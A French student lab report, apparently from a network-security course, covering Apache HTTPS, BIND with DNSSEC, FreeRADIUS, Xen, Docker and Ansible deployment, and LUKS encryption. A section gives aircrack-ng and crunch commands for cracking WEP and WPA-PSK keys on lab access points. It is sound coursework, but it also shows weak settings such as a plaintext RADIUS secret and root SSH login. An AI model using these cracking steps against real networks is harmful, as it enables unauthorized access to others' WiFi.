 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier '''/etc/bind/''' avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:/etc/bind# cat mycoplasma2.site'''&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 '''root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
'''&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
Freeradius est un serveur Radius libre permettant de s’authentifier. Le protocole radius permet de se connecter via un échange de paquets UDP. RADIUS est un protocole client-serveur. &lt;br /&gt;
La configuration du serveur FreeRADIUS consiste à :&lt;br /&gt;
&lt;br /&gt;
* Déclarer ses clients (adresses IP), les routeurs ou switchs, et d’y renseigner le mot de passe partagé ;&lt;br /&gt;
* Puis d’enregistrer les utilisateurs avec leur mot de passe.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps: &lt;br /&gt;
 root@mycoplasma:/ apt-get install freeradius&lt;br /&gt;
&lt;br /&gt;
Ensuite, il faut modifier les fichiers de configuration: &lt;br /&gt;
*  Déclarer ses clients&lt;br /&gt;
 root@mycoplasma:/etc/freeradius/3.0 # vi clients.conf &lt;br /&gt;
  client 10.60.200.2/24 {&lt;br /&gt;
   secret = secretIMA5SC&lt;br /&gt;
   shortname = borneMycoplasma&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
  client PA {&lt;br /&gt;
   ipaddr = 10.60.201.5&lt;br /&gt;
   secret = secretIMA5SC&lt;br /&gt;
  }&lt;br /&gt;
&lt;br /&gt;
* Enregistrer les utilisateurs&lt;br /&gt;
Il faut ajouter une ligne qui indique l'identifiant et le mot de passe. On a choisi les mêmes id que la VM : root et mot de passe habituel.&lt;br /&gt;
 root@mycoplasma:/etc/freeradius/3.0# vim users&lt;br /&gt;
&lt;br /&gt;
 user Cleartext-Password := &amp;quot;&amp;lt;password&amp;gt;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Enregistrer les modifications et relancer :&lt;br /&gt;
 service freeradius stop&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Enfin cette comande permet d'afficher les logs:&lt;br /&gt;
 root@mycoplasma:/etc/freeradius/3.0# tail -f /var/log/freeradius/radius.log&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible. Nous avons préparé le palybook suivant pour le déploiement de notre ferme de serveurs.&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# cat deploy-site.yaml''' &lt;br /&gt;
 ---&lt;br /&gt;
 - hosts: webservers&lt;br /&gt;
   tasks: &lt;br /&gt;
    - name: 1. Copying Website files&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/index.html&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/index.html&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 2. Copying Dockerfile&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/Dockerfile&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/Dockerfile&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 3. Install pip&lt;br /&gt;
      apt: name=python-pip state=present&lt;br /&gt;
    - name: 4. install docker package&lt;br /&gt;
      pip: name=docker&lt;br /&gt;
    - name: 5. Stop container if running&lt;br /&gt;
      docker_container:&lt;br /&gt;
       name: mycoplasmacontainer&lt;br /&gt;
       state: stopped&lt;br /&gt;
    - name: 6. delete image&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        force: yes&lt;br /&gt;
        state: absent&lt;br /&gt;
    - name: 7. Build Docker image from Dockerfile&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        path: &amp;quot;/tmp/docker/mycoplasma/&amp;quot;&lt;br /&gt;
        state: build&lt;br /&gt;
    - name: 8. Running the container&lt;br /&gt;
      docker_container:&lt;br /&gt;
        image: mycoplasma:latest&lt;br /&gt;
        state: started&lt;br /&gt;
        recreate: yes&lt;br /&gt;
        name: mycoplasmacontainer&lt;br /&gt;
        ports: &amp;quot;8002:80&amp;quot;&lt;br /&gt;
    - name: 9. Check if container is running&lt;br /&gt;
      shell: docker ps&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# ansible-playbook deploy-site.yaml'''&lt;br /&gt;
&lt;br /&gt;
[[Fichier:load_balancers.png]]&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
 root@zabethX:~#  fdisk -l // Permet de lister les partitions de la machine &lt;br /&gt;
&lt;br /&gt;
 root@zabethX:~# lsblk&lt;br /&gt;
&lt;br /&gt;
 NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 sda            254:0    0   124G  0 disk &lt;br /&gt;
   └─sda1 254:1    0   124G  0 part /&lt;br /&gt;
 sdb            254:16   0   8G  0 disk &lt;br /&gt;
   ├─sdb1 254:17   0  8G  0 part /&lt;br /&gt;
&lt;br /&gt;
Notre clé USB est sdb, on peut la crypter : &lt;br /&gt;
    root@zabethX:~# cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb1&lt;br /&gt;
On crée un répertoire de point de montage, par convention c'est /mnt mais on peut créer un autre dossier dans ce dernier: &lt;br /&gt;
    root@zabethX:~#  mkdir /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
On chiffre la clé USB, on doit entrer le mot de passe qui permettra de sécuriser la clé. &lt;br /&gt;
     root@zabethX:~#  cryptsetup luksOpen /dev/sdb1 usbkey&lt;br /&gt;
     root@zabethX:~# mkfs.ext4 /dev/mapper/usbkey&lt;br /&gt;
Il faut faire l'association entre la partition du périphérique et le point de montage.&lt;br /&gt;
     root@zabethX:~#  mount -t ext4 /dev/mapper/usbkey /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Il faut créer un fichier basique avec la commande vim par exemple, on peut écrire un mot et démonter la clé: &lt;br /&gt;
     root@zabethX:~#  umount /mnt/USBCrypt&lt;br /&gt;
&lt;br /&gt;
Lorsqu'on échange nos clés entre deux binômes, on remarque que le processus a bien fonctionné et que lorsqu'on essaye d'accéder à la clé cette dernière est protégé par un mot de passe.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;br /&gt;
Le but est de faire en sorte que l’accès à la borne WiFi soit controlé par WPA2-EAP. L’identification va se faire en utilisant le même serveur FreeRadius que pour la sécurisation filaire.&lt;br /&gt;
&lt;br /&gt;
Pour accéder à la configuration Wifi  :&lt;br /&gt;
